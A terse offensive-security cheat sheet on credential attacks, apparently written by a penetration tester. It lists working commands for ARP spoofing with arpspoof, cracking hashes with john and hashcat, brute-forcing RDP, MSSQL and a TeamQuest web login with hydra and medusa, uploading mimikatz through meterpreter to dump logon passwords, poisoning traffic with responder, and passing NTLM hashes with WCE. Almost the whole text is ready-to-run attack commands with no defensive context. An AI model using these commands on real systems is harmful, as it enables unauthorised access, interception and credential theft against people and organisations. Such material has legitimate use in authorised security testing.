Passwords


# ARP spoofing

echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof [-i interface] -t [target] [gateway]
arpspoof -i eth0 -t 10.0.0.10 10.0.0.1
------------------------------------------------------------------------------------------------------

# Cracking

john --wordlist=<wordlist> --format=<format> <hash file>

hashcat -m 5600 -a 1 <hashes>  -r /usr/share/hashcat/rules/combinator.rule

hydra -L <username list> -P <password list> -M <target list> <protocol>
hydra -l <username> -p <password> <target> <protocol>
hydra -l root -P /usr/share/wordlists/rockyou.txt -M 3389.txt rdp

hydra -l administrator -p admin -M targets.txt http-form-post "/teamquest/cgi-bin/login:username=^USER^&pass=^PASS^:S=302 Found" -s 2780
hydra -l administrator -p admin 10.0.0.10 http-form-post "/teamquest/cgi-bin/login:username=^USER^&pass=^PASS^:S=302 Found" -s 2780

medusa -h <targetIP> -u <username> -P <password list> -M <module>
medusa -h <targetIP> -u sa -P john.txt -M mssql
------------------------------------------------------------------------------------------------------

# Dump hashes with mimikatz

meterpreter > upload /usr/share/mimikatz/x64/mimikatz.exe c:\\
meterpreter > upload /usr/share/mimikatz/x64/mimikatz.sys c:\\
meterpreter > upload /usr/share/mimikatz/x64/sekurlsa.dll c:\\

meterpreter > shell

mimikatz.exe
priviledge::debug
sekurlsa::logonPasswords
------------------------------------------------------------------------------------------------------

# Sniffing

responder -i <IP> -wrf
------------------------------------------------------------------------------------------------------

# Windows Credential Editor (WCE)

How do I change my current NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash>

How do I create a new logon session and launch a program with new NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>

How can I generate NTLM hashes with WCE? (for testing purposes)
wce.exe -g <cleartext password>

How can I write hashes obtained by WCE to a file?
wce.exe -o hashes.txt
